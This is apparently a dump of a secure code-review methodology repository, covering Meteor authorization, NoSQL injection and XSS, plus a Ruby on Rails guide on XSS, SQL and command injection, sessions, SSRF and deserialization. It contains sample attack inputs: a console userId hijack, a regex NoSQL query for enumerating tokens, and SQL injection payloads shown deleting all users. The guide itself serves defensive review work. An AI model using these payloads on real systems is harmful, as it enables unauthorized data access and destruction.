317 |     throw new Meteor.Error('oauth.unauthorized',
318 |       'This oauth doesn\'t belong to you.');
319 |   }
320 | 
321 |   return OAuth.find(oauthId);
322 | });
323 | 
324 | // #2: Good, the client can only set the name on the currently logged in user
325 | Meteor.publish('oauth', function (oauthId) {
326 | 
327 |   const oauth = OAuth.findOne(oauthId);
328 | 
329 |   if (oauth.userId !== this.userId) {
330 |     throw new Meteor.Error('oauth.unauthorized',
331 |       'This oauth doesn\'t belong to you.');
332 |   }
333 | 
334 |   return OAuth.find(oauthId);
335 | });
336 | ```
337 | 
338 | To hijack the `userId`, run the following command in the browser console: 
339 | 
340 | ```jsx
341 | Meteor.connection.setUserId("USER_ID");
342 | ```
343 | 
344 | But there is one hidden security concern that you need to know about publications. Publications are not reactive, and they only re-run when the currently logged in `userId` changes. The data returned from publications will often be dependent on the currently logged in user, and perhaps some properties about that user - whether they are an admin, whether they own a certain document, etc. 
345 | 
346 | ```jsx
347 | // #1: Bad! If the owner of the list changes, the old owner will still see it
348 | Meteor.publish('list', function (listId) {
349 |   check(listId, String);
350 | 
351 |   const list = Lists.findOne(listId);
352 | 
353 |   if (list.userId !== this.userId) {
354 |     throw new Meteor.Error('list.unauthorized',
355 |       'This list doesn\'t belong to you.');
356 |   }
357 | 
358 |   return Lists.find(listId, {
359 |     fields: {
360 |       name: 1,
361 |       incompleteCount: 1,
362 |       userId: 1
363 |     }
364 |   });
365 | });
366 | 
367 | // #2: Good! When the owner of the list changes, the old owner won't see it anymore
368 | Meteor.publish('list', function (listId) {
369 |   check(listId, String);
370 | 
371 |   return Lists.find({
372 |     _id: listId,
373 |     userId: this.userId
374 |   }, {
375 |     fields: {
376 |       name: 1,
377 |       incompleteCount: 1,
378 |       userId: 1
379 |     }
380 |   });
381 | });
382 | ```
383 | 
384 | If the changes were applied to the collection but user remained their session active, they will still be able to access the data returned by publication because the publication’s callback function is run only when the `userId` of the user changes (only the `return` instruction is re-run). So the authorization check should be implemented on the query itself:
385 | 
386 | ```jsx
387 | return Lists.find({
388 |     _id: listId,
389 |     userId: this.userId
390 |   }, {
391 |     fields: {
392 |       name: 1,
393 |       incompleteCount: 1,
394 |       userId: 1
395 |     }
396 |   });
397 | ```
398 | 
399 | This authorization issue is limited by the time and is valid till user logs out.
400 | 
401 | # NoSQL Injections
402 | 
403 | App users should never have ability to control the “search” parameters (filters, selectors, etc ...) of the NoSQL queries within the Meteor methods and publications. Beyond authorization issues the app could be exposed to NoSQL injections.
404 | 
405 | Example of the vulnerable Meteor method which allows user to control NoSql query parameter:
406 | 
407 | ```jsx
408 | // Bad! User can perform NoSQL injection and retrieve password hashes, user's app tokens by controlling the query search. For example: the ////"token": {$regex: '^[a-z].*'} // start's with [a-z] (26 possibilities) //// NoSql query parameter will allow a user to enumerate tokens of other users:
409 | Meteor.methods({
410 | 'users.count'({ filter }) {
411 | 	return Meteor.users.find(filter).count();
412 | }});
413 | ```
414 | 
415 | Example of the client-side call:
416 | 
417 | ```jsx
418 | Meteor.call("users.count", {
419 | 		"username": "kertojasoo",
420 | 		"token": {$regex: '^[a-z].*'} // start's with [a-z] (26 possibilities)
421 | 		}, console.log);
422 | ```
423 | 
424 | # Cross Site Scripting (XSS) attacks
425 | 
426 | Meteor renders the content on the client-side, the application should have data sanitization in the Meteor methods to prevent basic XSS attack vectors. Meteor apps use Blaze framework for HTML rendering if user data is inserted into the raw HTML inclusion (triple mustache `{{{`), it is possible to achieve a XSS attack.
427 | 
428 | # Links and References
429 | <details><summary>Links and References</summary><blockquote>
430 | 
431 | 1. [Hacking meteor ddp](https://hackernoon.com/hacking-meteor-ddp-9da37790b37b)
432 | 2. [Guide meteor userid-ddp](https://guide.meteor.com/accounts.html#userid-ddp)
433 | 3. [Guide meteor structure](https://guide.meteor.com/structure.html)
434 | 4. [Guide meteor client-settings](https://guide.meteor.com/security.html#client-settings)
435 | 5. [Guide meteor attack-surface](https://guide.meteor.com/security.html#attack-surface)
436 | 6. [Docs meteor collections Mongo-Collection-deny](https://docs.meteor.com/api/collections.html#Mongo-Collection-deny)
437 | 7. [Guide meteor security allow-deny](https://guide.meteor.com/security.html#allow-deny)
438 | 8. [Wekan Authentication Bypass - Exploiting Common Pitfalls of MeteorJS | Offensive Security](https://www.offensive-security.com/offsec/wekan-authentication-bypass/)
439 | </blockquote></details>
440 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # About
 2 | 
 3 | The CodeAllTheThings project aims to provide security methodology on how to manually review the application codebase and search for security vulnerabilities through source code, explain the architecture of application frameworks, provide an easier technical transition to the desired framework / language / technology.
 4 | 
 5 | # Goals
 6 | 
 7 | By developing and hosting this project, we want to accomplish several things:
 8 | 
 9 | 1. Increase developer awareness of where and why security vulnerabilities are actually located.
10 | 2. Train developers and security engineers by providing a codebase security vision.
11 | 3. Show security folks that source code reviews are a much cooler way to learn and find vulnerabilities.
12 | 
13 | # Audience
14 | 
15 | This project will be a good source of knowledge for developers, application security engineers, penetration testers, and people who are involved in red team activities. The audience of this project is quite broad and will be useful for those who need to develop, review, integrate, and work with the described technologies, programming languages, and frameworks.
16 | 
17 | # Contribution
18 | 
19 | At the moment the Octal Security team is taking care of most of the project development, but we really need help from the security community. To make this project great, we will need more security researchers and developers contributing to this project. United we are stronger, smarter, and more aware.
20 | 
21 | If you see that we missed some information in the published methodologies or just want to add a new methodology document, feel free to make a pull request, we will review your work and, if it meets our needs, we will add it to the repository project. If you have contributed to the project, we will be happy to post a message on our social networks to inform that you are part of this project and what you have contributed. 
22 | 
23 | There is an example template of what the methodology page should look like and what we are trying to communicate to the reader. If you are ready to contribute, check out the template page below to understand our needs:
24 | 
25 | [_template](https://github.com/Octal-Security/CodeAllTheThings/blob/main/_template.md)
26 | 


--------------------------------------------------------------------------------
/Ruby on Rails/README.md:
--------------------------------------------------------------------------------
  1 | # Ruby on Rails
  2 | 
  3 | Authors: [Viktoriia Taran](https://www.linkedin.com/in/viktoriia-taran/), [Rostyslav Grynov](https://www.linkedin.com/in/rostyslav-grynov/)
  4 | 
  5 | <aside>
  6 | 🤓 This guide will be constantly updated with new vulnerabilities and their patterns. Feel free to add something new.
  7 | 
  8 | </aside>
  9 | 
 10 | > Rails is a web application development framework written in the Ruby programming language. Rendering HTML templates, updating databases, sending and receiving emails, maintaining live pages via WebSockets, enqueuing jobs for asynchronous work, storing uploads in the cloud. This framework has many built-in security options, but they can be disabled by developers :)
 11 | > 
 12 | 
 13 | # Security Checklist
 14 | 
 15 | - [ ]  The source code does not rely on hard-coded credentials and secrets.
 16 | - [ ]  The application doesn’t use HTML characters escape like `raw`, `html_safe`, `content_tag` etc. The application doesn’t have security flag set to `ActiveSupport::escape_html_entities_in_json = false` , which may lead to XSS when using `to_json()` method.
 17 | - [ ]  The `protect_from_forgery` setting is defined in the controllers, the `<%= csrf_meta_tags %>` setting is defined in the HTML templates.
 18 | - [ ]  Users have no direct control over rendering ERB templates.
 19 | - [ ]  The application validates user input and doesn’t send it to the dangerous functions such as `eval`.
 20 | - [ ]  The application uses parameterization instead of concatenation when crafting SQL queries.
 21 | - [ ]  The application uses `config.force_ssl = true`. Ensure that application uses strong hash algorithm for cookies signatures in the `Rails.application.config.action_dispatch.signed_cookie_digest = "SHA256"` setting. Environments must use a random key present in `config/credentials.yml.enc` and key must be encrypted.
 22 | - [ ]  User controlled URLs are not permitted to request internal resources, and to redirect a user to third-party services.
 23 | - [ ]  The application uses `\A \z`  to define the start, and the end of the string or specify `multiline: **true`.**
 24 | - [ ]  The application doesn’t use `Marshal` library to serialize and unserialize objects.
 25 | - [ ]  The application applied a list of permitted parameters in `permit` method, which limits parameters to be modified by a user.
 26 | - [ ]  The application doesn’t have security flag set to `config.active_record.whitelist_attributes=false`, which stands for mass assignment.
 27 | - [ ]  The application does not use `URI#open` method from `open-uri` library.
 28 | 
 29 | # Security Review
 30 | 
 31 | RoR web applications follow the MVC (model, view, and controller) architecture. Most of client-side vulnerabilities appears within the view component. Views are built with ERB template engine, thus even SSTI vulnerabilities are quite common thing. All the server-side business logic is handled by the controller component. Developers should be aware about security of RoR applications, since most of the vulnerabilities appears within unique specifics regarded only to RoR applications. The next section describes common security pitfalls, and how their patterns can be identified during source code review. They usually occurs, when developers disable built-in security options or do not follow security coding practices.
 32 | 
 33 | ## Framework architecture
 34 | 
 35 | RoR (Ruby on Rails) application has the following code base structure:
 36 | 
 37 | ```bash
 38 | .
 39 | ├── Dockerfile #software version, hardcoded credentials
 40 | ├── Gemfile #software versions
 41 | ├── Gemfile.lock #software versions
 42 | ├── app
 43 | │   ├── assets # images, video etc
 44 | │   ├── controllers #all application logic located here
 45 | │   │   ├── admin_controller.rb
 46 | │   │   ├── users_controller.rb
 47 | │   ├── helpers #helper - method that is (mostly) used to share reusable code
 48 | │   │   ├── admin_helper.rb
 49 | │   ├── mailers #allows send emails from your application using mailer classes
 50 | │   │   └── user_mailer.rb
 51 | │   ├── models #Ruby class that is used to represent data 
 52 | │   │   ├── user.rb
 53 | │   └── views # HTML templates
 54 | │       ├── admin
 55 | │       │   ├── get_all_users.html.erb
 56 | ├── config #app configuration, should be reviewed because developers can disable security features
 57 | │   ├── application.rb #application configuration
 58 | │   ├── boot.rb
 59 | │   ├── database.yml #database config, may contain hard-coded creds
 60 | │   ├── environment.rb
 61 | │   ├── environments
 62 | │   │   ├── development.rb #application configuration
 63 | │   ├── initializers
 64 | │   │   ├── constants.rb #hardcoded credentials
 65 | │   │   ├── filter_parameter_logging.rb #logging
 66 | │   │   ├── html_entities.rb #Enables or disables the escaping of HTML entities in JSON serialization
 67 | │   │   ├── key.rb #hardcoded credentials
 68 | │   │   ├── secret_token.rb #cookie signing
 69 | │   │   ├── session_store.rb #how session store is organized
 70 | │   ├── locales
 71 | │   │   └── en.yml #hardcoded credentials
 72 | │   ├── routes.rb #First thing to investigate, application routing
 73 | │   ├── secrets.yml #Is credentials/secrets encrypted?
 74 | │   └── secrets2.yml #Is credentials/secrets encrypted?
 75 | ├── db
 76 | │   ├── schema.rb #database schema
 77 | │   └── seeds.rb #database data, may contain hard-coded creds
 78 | ├── lib #extended modules
 79 | │   ├── encryption.rb #encryption
 80 | ├── log #log files
 81 | ├── public #static files and compiled assets
 82 | │   ├── 404.html
 83 | │   └── robots.txt
 84 | ├── script
 85 | ├── spec #for testing purposes
 86 | └── vendor #third-party code
 87 | ```
 88 | 
 89 | [Understanding your Rails Application Structure [Beginners Guide] | HackerNoon](https://hackernoon.com/understanding-your-rails-application-structure-r8w32xj)
 90 | 
 91 | [Getting Started with Rails - Ruby on Rails Guides](https://guides.rubyonrails.org/getting_started.html#creating-the-blog-application)
 92 | 
 93 | ### Sensitive files
 94 | 
 95 | ```markdown
 96 | /config/database.yml -  May contain production credentials.
 97 | /config/initializers/secret_token.rb - Contains a secret used to hash session cookies.
 98 | /db/seeds.rb - May contain seed data including bootstrap admin user.
 99 | /db/development.sqlite3 -  May contain real data.
100 | ```
101 | 
102 | ## MVC architecture
103 | 
104 | Routes, controllers, actions, views and models are typical pieces of a web application that follows the [MVC (Model-View-Controller)](https://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93controller) pattern. MVC is a design pattern that divides the responsibilities of an application to make it easier to reason about. Rails follows this design pattern by convention.
105 | 
106 | ### Routes
107 | 
108 | We recommend starting the security review with the app routing, because it allows mapping routes with its handlers to understand the API structure of the application. Router determines what kind of controller and action should actually execute the code. App routing is described within `/config/routes.rb` file. 
109 | 
110 | The code base below would process users’ request, if they will request the `https://app.domain.com/patients/<id>` URL. When RoR server receives user’s request, it knows that it should execute code within the controller `patients` and action `show`.
111 | 
112 | ```ruby
113 | get '/patients/:id', to: 'patients#show'
114 | ```
115 | 
116 | We could also find something like this:
117 | 
118 | 1. Declare all of the common routes for a given resourceful controller like `index`, `show`, `new`, `edit`, `create`, `update`, and `destroy` actions.
119 |     
120 |     ```ruby
121 |     resources :photos
122 |     ```
123 |     
124 | 2. Limit the actions which can be used for the resourceful controller.
125 |     
126 |     ```ruby
127 |     resources :comments, only: [:show, :edit, :update, :destroy]
128 |     ```
129 |     
130 | 3. Organise the resources under the namespace “admin” and navigate to them like /admin/posts or /admin/comments.
131 |     
132 |     ```ruby
133 |     namespace "admin" do
134 |       resources :posts, :comments
135 |     end
136 |     ```
137 |     
138 | 
139 | Follow the documentation for other possible routes mapping:
140 | 
141 | [ActionDispatch::Routing::Mapper](https://api.rubyonrails.org/v7.0.3.1/classes/ActionDispatch/Routing/Mapper.html)
142 | 
143 | [Rails Routing from the Outside In - Ruby on Rails Guides](https://guides.rubyonrails.org/routing.html)
144 | 
145 | ### Controllers & Actions
146 | 
147 | The controllers is an actual application business logic, each controller can be found within the `app/controllers/..` folder. Example:
148 | 
149 | ```bash
150 | ├── app
151 | │   ├── controllers #all application logic located here
152 | │   │   ├── admin_controller.rb
153 | ```
154 | 
155 | Example of simple controller. A controller is a Ruby class which inherits base `ApplicationController` class and all its methods. The `<` sing is an inheritance.
156 | 
157 | ```ruby
158 | class ClientsController < ApplicationController
159 |   def new
160 |   end
161 | end
162 | ```
163 | 
164 | As an example, if a user goes to `/clients/new` path in your application to add a new client, Rails will create an instance of `ClientsController` controller and execute its `new` method. What’s worth to mention is that empty method from the example above would work. Because Rails would render the `new.html.erb` view by default, unless the method defines different logic. By creating a new `Client`, the `new` method can make a `@client` instance variable accessible in the view:
165 | 
166 | ```ruby
167 | def new
168 |   @client = Client.new
169 | end
170 | ```
171 | 
172 | [Action Controller Overview - Ruby on Rails Guides](https://guides.rubyonrails.org/action_controller_overview.html)
173 | 
174 | [Action Controller Overview - Ruby on Rails Guides](https://guides.rubyonrails.org/action_controller_overview.html#methods-and-actions)
175 | 
176 | ### Views
177 | 
178 | Views are stored within the following `app/views/[controller]/[view_name].html.erb` pattern path. View is a simple HTML page managed by ERB template engine, which displays values returned from the controller.
179 | 
180 | ```ruby
181 | <h1>Articles</h1>
182 | <ul>
183 |   <% @articles.each do |article| %>
184 |     <li>
185 |       <%= article.title %>
186 |     </li>
187 |   <% end %>
188 | </ul>
189 | ```
190 | 
191 | The methodology for mapping routes to views is the following:
192 | 
193 | 1. Controller’s action has the same name in the routes file as a view name.
194 |     1. If the `resources` specified, a view name corresponds to a controller’s action.  For example, `POST` method calls `create` action and app/views/[controller]/create.html.erb view is displayed. 
195 | 2. `Render` method is used in the controller’s code or template itself to display a view.
196 | 
197 | [Layouts and Rendering in Rails - Ruby on Rails Guides](https://guides.rubyonrails.org/layouts_and_rendering.html)
198 | 
199 | ### Models
200 | 
201 | A model is a Ruby class that is used to represent data. Additionally, models can interact with the application's database through a feature of Rails called Active Record.
202 | 
203 | Example of User model located under `app/models`:
204 | 
205 | ```ruby
206 | class User < ApplicationRecord
207 |   validates :name, presence: true
208 | end
209 | ```
210 | 
211 | Model is used to describe object and use it through the application.
212 | 
213 | [Active Record Basics - Ruby on Rails Guides](https://guides.rubyonrails.org/active_record_basics.html)
214 | 
215 | ## XSS
216 | 
217 | By default, RoR escapes HTML entities, but it proposes a couple of methods to disable HTML characters escape like `raw`, `html_safe`, `content_tag` etc.
218 | 
219 | ****Unescaped variable enters template engine in Ruby code****
220 | 
221 | - `html = "<div>#{name}</div>".html_safe`
222 | - `content_tag :p, "Hello, #{name}”`
223 | - `raw @user.name`
224 | - `config.active_support.escape_html_entities_in_json = false` It leads to XSS, when `Hash#to_json()` used.
225 | 
226 | ****Bypassing the template engine****
227 | 
228 | - `ERB.new("<div>#{@user.name}</div>").result`
229 | - `render inline: "<div>#{@user.name}</div>”`
230 | - `render text: "<div>#{@user.name}</div>”`
231 | 
232 | ****Templates: Variable explicitly unescape****
233 | 
234 | - `<%= name.html_safe %>`
235 | - `<%= content_tag :p, "Hello, #{name}" %>`
236 | - `<%= raw @user.name =>`
237 | - `<%== @user.name %>`
238 | 
239 | ****Templates: Variable in dangerous location****
240 | 
241 | - `<div class=<%= classes %></div>`
242 | - `<a href="<%= link %>"></a>`
243 | - `<%= link_to "Here", @link %>`
244 | - `<script>var name = <%= name %>;</script>`
245 | 
246 | [XSS prevention for Ruby on Rails | Semgrep](https://semgrep.dev/docs/cheat-sheets/rails-xss/)
247 | 
248 | ## Command injection
249 | 
250 | ![https://i.stack.imgur.com/1Vuvp.png](https://i.stack.imgur.com/1Vuvp.png)
251 | 
252 | List of command injection sinks:
253 | 
254 | ```markdown
255 | eval("ruby code here")
256 | system("os command here")
257 | `ls -al /` # (backticks contain os command)
258 | exec("os command here")
259 | spawn("os command here")
260 | open("| os command here")
261 | URI#open from open-uri
262 | Process.exec("os command here")
263 | Process.spawn("os command here")
264 | IO.binread("| os command here")
265 | IO.binwrite("| os command here", "foo")
266 | IO.foreach("| os command here") {}
267 | IO.popen("os command here")
268 | IO.read("| os command here")
269 | IO.readlines("| os command here")
270 | IO.write("| os command here", "foo")
271 | syscall
272 | %x() %x %x{} %x-os-
273 | popen<n>
274 | exec
275 | Open3.popen3()
276 | fork()
277 | PTY.spawn()
278 | constantize
279 | ```
280 | 
281 | ## SQL injection
282 | 
283 | Concatenation of user input with SQL query parameter will lead to SQL injection. Example:
284 | 
285 | ```ruby
286 | User.where("name = '#{params[:name]'") # SQL Injection!
287 | ```
288 | 
289 | To mitigate the risk of this kind of SQL injection the application should use parametrization, there are 2 examples of those:
290 | 
291 | ```ruby
292 | User.where(["name = ?", "#{params[:name]}"])
293 | ```
294 | 
295 | ```ruby
296 | User.where({ name: params[:name] })
297 | ```
298 | 
299 | In those 2 examples there is no direct operations with SQL query, column `name` is set explicitly to the `name` key.
300 | 
301 | ### Potentially vulnerable methods
302 | 
303 | **Calculate Methods**
304 | 
305 | `Calculate` function takes an operation and a `column` name to calculate an amount or find a maximum/minimum/average value. The `column` value is a user controlled parameter:
306 | 
307 | ```ruby
308 | **Order**.calculate(:sum, params[:column])
309 | ```
310 | 
311 | Since parametrization and sanitization are missing user can manipulate a column value and achieve a limited SQL injection. An attacker could calculate values from the other tables:
312 | 
313 | ```ruby
314 | params[:column] = "age) FROM users WHERE name = 'Bob';"
315 | ```
316 | 
317 | The final SQL query sums an age of users named Bob from the users table:
318 | 
319 | ```sql
320 | **Query
321 | SELECT** **SUM**(age) **FROM** users **WHERE** name = 'Bob';) **FROM** "orders"
322 | **Result
323 | 7**6
324 | ```
325 | 
326 | **Delete By Method**
327 | 
328 | The `delete_all` method takes the same kind of conditions arguments as `where`.
329 | The argument can be a string, an array, or a hash of conditions. Strings will not be escaped at all. Use an array or hash to parameterize arguments.
330 | 
331 | ```ruby
332 | 
333 | **User**.delete_by("id = **#{**params[:id]**}**")
334 | ```
335 | 
336 | This example bypasses any conditions and deletes all users.
337 | 
338 | ```ruby
339 | params[:id] = "1) OR 1=1--"
340 | ```
341 | 
342 | The final SQL query deletes all users and result returns an amount of deleted users:
343 | 
344 | ```sql
345 | Query
346 | DELETE FROM "users" WHERE (id = 1) OR 1=1--)
347 | 
348 | Result
349 | 6
350 | ```
351 | 
352 | **Destroy By Method** 
353 | 
354 | The `destroy_by` method takes the same kind of conditions arguments as `where`.
355 | The argument can be a string, an array, or a hash of conditions. Strings will not be escaped at all. Use an array or hash to safely parameterize arguments.
356 | 
357 | ```ruby
358 | **User**.destroy_by(["id = ? AND admin = '**#{**params[:admin]**}**", params[:id]])
359 | ```
360 | 
361 | This example bypasses any conditions and deletes all users.
362 | 
363 | ```ruby
364 | params[:admin] = "') OR 1=1--'"
365 | 
366 | ```
367 | 
368 | The final SQL query destroys all users and result returns an amount of destroyed users:
369 | 
370 | ```sql
371 | Query
372 | DELETE FROM "users" WHERE "users"."id" = ?
373 | ```
374 | 
375 | [Rails SQL Injection Guide: Examples andPrevention](https://www.stackhawk.com/blog/sql-injection-prevention-rails/)
376 | 
377 | [Rails SQL Injection Examples](https://rails-sqli.org/)
378 | 
379 | ## SSTI
380 | 
381 | Occurs when an attacker could directly manipulate with ERB template like this:
382 | 
383 | - `ERB.new("<div>#{@user.name}</div>").result`
384 | 
385 | ## Sessions
386 | 
387 | ### Session Hijacking
388 | 
389 | *Stealing a user's session ID allows an attacker to use the web application in the victim's name.*
390 | 
391 | Here are some ways to hijack a session, and their countermeasures:
392 | 
393 | - Sniff the cookie in an insecure network. That’s why the connection must be secure. In Rails 3.1 and later, this could be accomplished by always forcing SSL connection in your application config file: `config.force_ssl = true`
394 | - Instead of stealing a cookie unknown to the attacker, they fix a user's session identifier (in the cookie) known to them.
395 | 
396 | ### Session Storage
397 | 
398 | Rails uses `ActionDispatch::Session::CookieStore` as the default session storage.
399 | 
400 | Rails `CookieStore` saves the session hash in a cookie on the client-side. The server retrieves the session hash from the cookie and eliminates the need for a session ID. That will greatly increase the speed of the application, but it is a controversial storage option and you have to think about the security implications and storage limitations of it:
401 | 
402 | - Cookies expiration must be in place
403 | - No sensitive information must be in cookies
404 | - The application must invalidate old session cookies to avoid malicious reuse
405 | - Cookies must be encrypted. Rails encrypts cookies by default
406 | 
407 | The `CookieStore` uses the [encrypted](https://api.rubyonrails.org/v7.0.3/classes/ActionDispatch/Cookies/ChainedCookieJars.html#method-i-encrypted) cookie jar to provide a secure, encrypted location to store session data. 
408 | 
409 | The encryption key for cookies, is derived from the `secret_key_base` configuration value.
410 | 
411 | Secrets must be long and random(`bin/rails secret` must be used to get new unique secrets).
412 | 
413 | Different salt values for encrypted and signed cookies must be used. 
414 | 
415 | Environments must use a random key present in `config/credentials.yml.enc`, shown here in its decrypted state: `secret_key_base: 492f...`
416 | 
417 | ### Signed Cookies Configurations
418 | 
419 | Example of specifying the digest used for signed cookies:
420 | 
421 | `Rails.application.config.action_dispatch.signed_cookie_digest = "SHA256"`
422 | 
423 | Strong cryptographic algorithm must be in place.
424 | 
425 | ### Replay Attacks for CookieStore Sessions
426 | 
427 | If cookie stores sensitive information such as credit balance an attacker can reuse old cookies this bigger balance and abuse the system.
428 | 
429 | No sensitive information must be in cookies or a nonce (random value) must be in place to prevent replay attacks. A nonce is valid only once, and the server has to keep track of all the valid nonces. 
430 | 
431 | ### Session Fixation
432 | 
433 | ![https://guides.rubyonrails.org/images/security/session_fixation.png](https://guides.rubyonrails.org/images/security/session_fixation.png)
434 | 
435 | Attack focuses on fixing a user's session ID known to the attacker, and forcing the user's browser into using this ID. It is therefore not necessary for an attacker to steal the session ID afterwards.
436 | 
437 | The most effective countermeasure is to *issue a new session identifier* and declare the old one invalid after a successful login. That way, an attacker cannot use the fixed session identifier. This is a good countermeasure against session hijacking, as well. Here is how to create a new session in Rails:
438 | 
439 | `reset_session`
440 | 
441 | [Devise](https://rubygems.org/gems/devise) gem for user management, it will automatically expire sessions on sign in and sign out for you. 
442 | 
443 | [Securing Rails Applications - Ruby on Rails Guides](https://guides.rubyonrails.org/security.html#sessions)
444 | 
445 | ## CSRF
446 | 
447 | By default, Rails includes an [unobtrusive scripting adapter](https://github.com/rails/rails-ujs), which adds a header called `X-CSRF-Token` with the security token on every non-GET and non-HEAD Ajax call. Without this header, non-GET and non-HEAD Ajax requests won't be accepted by Rails.
448 | 
449 | - `protect_from_forgery` in application_controller
450 | - `<%= csrf_meta_tags %>` in template
451 | 
452 | ## SSRF
453 | 
454 | To find SSRF vulnerabilities during source code review first libraries used by the application must be identified, next corresponding dangerous functions using next check-list must be found:
455 | 
456 | 1. `net/http` library:
457 |     1. `require 'net/http'`
458 |     2. `Net::HTTP.get()`  or `Net::HTTP.get_print()` or `Net::HTTP.get_responce()`- make request
459 |     `Net::HTTP.start(uri.hostname, uri.port)` - creates connection to host
460 |     `Net::HTTP::Get.new uri` - `Get` request within connection
461 |     
462 |     Redirect bypass - look for `Net::HTTPRedirection` and decide whether redirects happens.
463 |     
464 | 2. `OpenURI` library:
465 |     1. `URI.open()`
466 | 3. `httparty` library:
467 |     1. `require 'httparty'`
468 |     2. `HTTParty.get` -  make request
469 | 4. `http` library:
470 |     1. `require 'http'`
471 |     2. `HTTP.get` or `HTTP.follow.get` - make request
472 |     `HTTP.persistent` - persistent session
473 |     
474 |     Redirect bypass -  `HTTP.follow.get` will perform location redirection.
475 |     
476 | 5. `faraday` library:
477 |     1. `require 'faraday'`
478 |     2. `Faraday.get` or `HTTP.follow.get` - make request
479 |     `Faraday.new` - request creation
480 |     
481 |     Redirect bypass - `.response :follow_redirects` 
482 |     
483 | 6. `Httpx` library:
484 |     1. `require "httpx"`
485 |     2. `HTTPX.get` or `HTTPX.post`
486 | 7. `rest-client` library:
487 |     1. `require 'rest-client'`
488 |     2. `RestClient.get`, `RestClient.post`, `RestClient::Request.execute`, `RestClient.delete`,`RestClient::Resource.new`
489 | 
490 | 8. `Excon` library:
491 | 
492 | 1. `require 'excon'`
493 | 2. `Excon.get`, `Excon.new`, `Excon.post`
494 | 
495 | 9. `Typhoeus` library:
496 | 
497 | 1. `require 'typhoeus'`
498 | 2. `Typhoeus::Request.new`, `Typhoeus::Hydra.hydra`
499 | 1. `Curb` library:
500 |     1. `require 'curb'`
501 |     2. `Curl.get`, `Curl.post`,`Curl::Easy.perform`,`Curl::Easy.new`,`Curl::Easy.http_post`
502 | 
503 | In addition, all methods and functions that can make HTTP requests should be analyzed to determine if they use user input and how this might affect the requests.
504 | 
505 | ## Redirects
506 | 
507 | Surprisingly, but most of tested RoR apps have open HTTP redirects vulnerabilities, why? RoR framework has special methods for redirection like `redirect_to`, `redirect_back`  and developers do not validate the domain before redirecting a user.
508 | 
509 | - `redirect_to params[:to]`
510 | - `redirect_back`, `redirect_back_or_to` -> takes URL from Referrer and redirects a user to it
511 | 
512 | Comment:
513 | 
514 | Starting from Rails 7.0, open redirect protection `raise_on_open_redirects` takes place in the file `config/initializers/new_framework_defaults_7_0.rb`. Thus, to allow open redirect, it should be explicitly allowed like (or enabled globally):
515 | 
516 | - `redirect_to "https://rubyonrails.org", allow_other_host: true`
517 | 
518 | ## Business logic
519 | 
520 | ### RegExp
521 | 
522 | Very funny thing, but common regexp rules do not work in RoR, but why? RoR string seems to be multi-line, thus `/^https?:\/\/[^\n]+$/i` will check only the first line leaving the others. It can be a sink for many other vulnerabilities like SQLi, command injections, XSS etc. The proper way to check string with regexp is `/\Ahttps?:\/\/[^\n]+\z/i`  (`\A \z`) or enable `multiline: **true`.**
523 | 
524 | `\A` - start of the line
525 | 
526 | `\z` - end of the line
527 | 
528 | ### Mass assignment
529 | 
530 | It’s a quite common vulnerability and it takes place, when a developer rewrites default action like `create`, `update` and does not validate parameters to accept.
531 | 
532 | ```ruby
533 | def create
534 |     user = User.new(user_params)
535 | 
536 | def user_params
537 |     params.require(:user).permit!
538 | end
539 | ```
540 | 
541 | In addition, a developer can add this parameter to `attr_protected`, thus mass assignment won’t work there. Otherwise, it can be done globally via flag `config.active_record.whitelist_attributes = true`, where a specific file is created attributes available for mass-assignment.
542 | 
543 | ### HEAD bypass
544 | 
545 | RoR router treats HEAD method as GET. For example, the routes file contains `get 'app/index'` and HTTP requests can be made like `GET app/index` and `HEAD app/index`. So Rails router does not distinguish HEAD and GET methods, but the controllers can do that. If the controller checks for GET method, so HEAD method can be used to bypass the checks:
546 | 
547 | ```ruby
548 | if request.get?
549 |   #do something
550 | else (HEAD method goes there)
551 |   #grant permission
552 | end
553 | ```
554 | 
555 | [Bypassing GitHub's OAuth flow](https://blog.teddykatz.com/2019/11/05/github-oauth-bypass.html)
556 | 
557 | ## Insecure deserialization
558 | 
559 | Ruby uses the `Marshal` library to serialize and unserialize objects. Marshalling is an unsafe way to deserialize the provided data because the `Marshal.load()` method can deserialize any class loaded into the Ruby process, which can lead to remote code execution (RCE) attacks.
560 | 
561 | - `Marshal.load()`
562 | - `ActiveSupport::MessageVerifier.new(key)` - By default, Marshall serializer is used, if no other is specified
563 | - `Rails.application.message_verifier()` - For this particular case, there is no option to specify a serializer
564 | 
565 | Message verifier is used to calculate a signature and prevent the tampering of transmit data. To exploit the insecure deserialization and achieve RCE, an attacker would need to obtain a key used for signature calculation.
566 | 
567 | ## Misconfigurations
568 | 
569 | This group will include RoR built-in flags, which can be disabled by developers and pose a treat for applications:
570 | 
571 | - `config.active_record.whitelist_attributes=false` → mass assignment
572 | - `ActiveSupport::escape_html_entities_in_json = false` → XSS when to_json()
573 | 
574 | # References
575 | 
576 | [Ruby on Rails - OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html)
577 | 
578 | [Securing Rails Applications - Ruby on Rails Guides](https://guides.rubyonrails.org/security.html)
579 | 
580 | [Brakeman](https://brakemanscanner.org/)
581 | 
582 | [GitHub - brunofacca/zen-rails-security-checklist: Checklist of security precautions for Ruby on Rails applications.](https://github.com/brunofacca/zen-rails-security-checklist#the-checklist)
583 | 


--------------------------------------------------------------------------------
/_template.md:
--------------------------------------------------------------------------------
 1 | **Authors: linkedin, twitter, whatever links**
 2 | 
 3 | **Disclaimer: It is still under research, this guide can be extended.**
 4 | 
 5 | > Introduction to framework or technology the paper is dedicated to, or the TL;DR
 6 | > 
 7 | 
 8 | # Security Checklist
 9 | 
10 | - [ ]  Create a check list based on the `review methodology` section
11 | - [ ]  `some rules are not defined ...`
12 | - [ ]  `app has no internal sanitization while using this function check smth ...`
13 | - [ ]  `review this function for rce ...`
14 | - [ ]  `…`
15 | 
16 | # Review Methodology
17 | 
18 | Intro to the review, provide a short bio of the framework / technology / language
19 | 
20 | ## Setup
21 | 
22 | If the setup is needed, what to do, add code snippets, commands, methods to get started.
23 | 
24 | ## Architecture review
25 | 
26 | If the framework has a complex architecture, it makes sense to tell abstract what it is, where to look at, make brief summary how it is located in the code etc …
27 | 
28 | # Vulnerability #N
29 | 
30 | The main reason we are doing this project it is not just to include the sinks, we need to give our complex review of the problem. 
31 | 
32 | 1. Show the sink
